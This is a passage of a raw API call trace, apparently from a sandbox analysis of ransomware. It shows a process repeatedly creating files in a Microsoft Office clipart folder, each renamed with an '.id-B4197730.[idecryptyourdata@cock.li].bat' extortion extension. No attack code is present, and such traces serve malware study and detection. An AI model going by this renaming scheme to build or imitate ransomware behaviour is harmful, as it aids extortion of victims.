dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.991] CloseHandle (hObject=0x510) returned 1 [0162.992] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.992] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.993] CloseHandle (hObject=0x510) returned 1 [0162.994] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.994] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.995] CloseHandle (hObject=0x510) returned 1 [0162.995] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.996] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0162.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.996] CloseHandle (hObject=0x510) returned 1 [0163.003] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.004] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.004] CloseHandle (hObject=0x510) returned 1 [0163.005] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.005] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.005] CloseHandle (hObject=0x510) returned 1 [0163.234] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.234] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.234] CloseHandle (hObject=0x514) returned 1 [0163.237] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.238] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.238] CloseHandle (hObject=0x514) returned 1 [0163.240] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.240] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.241] CloseHandle (hObject=0x514) returned 1 [0163.241] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.242] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.242] CloseHandle (hObject=0x514) returned 1 [0163.244] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.244] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.244] CloseHandle (hObject=0x514) returned 1 [0163.246] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.246] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.246] CloseHandle (hObject=0x514) returned 1 [0163.247] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.247] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.247] CloseHandle (hObject=0x514) returned 1 [0163.254] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.254] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.255] CloseHandle (hObject=0x514) returned 1 [0163.256] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.256] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.257] CloseHandle (hObject=0x514) returned 1 [0163.259] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.259] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.260] CloseHandle (hObject=0x514) returned 1 [0163.260] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.261] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.261] CloseHandle (hObject=0x514) returned 1 [0163.262] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.262] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.263] CloseHandle (hObject=0x514) returned 1 [0163.264] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.264] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.264] CloseHandle (hObject=0x514) returned 1 [0163.266] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.266] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.266] CloseHandle (hObject=0x514) returned 1 [0163.267] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.267] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.267] CloseHandle (hObject=0x514) returned 1 [0163.268] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.268] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.268] CloseHandle (hObject=0x514) returned 1 [0163.269] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.270] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.270] CloseHandle (hObject=0x514) returned 1 [0163.271] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.271] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.271] CloseHandle (hObject=0x514) returned 1 [0163.273] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.273] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0163.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.276] CloseHandle (hObject=0x514) returned 1 [0165.118] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.118] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.119] CloseHandle (hObject=0x52c) returned 1 [0165.120] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.120] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.121] CloseHandle (hObject=0x52c) returned 1 [0165.121] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.121] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.122] CloseHandle (hObject=0x52c) returned 1 [0165.122] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.123] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.123] CloseHandle (hObject=0x52c) returned 1 [0165.124] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.124] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.124] CloseHandle (hObject=0x52c) returned 1 [0165.126] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.126] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.126] CloseHandle (hObject=0x52c) returned 1 [0165.126] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.126] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200289.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200289.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.127] CloseHandle (hObject=0x52c) returned 1 [0165.127] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.127] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 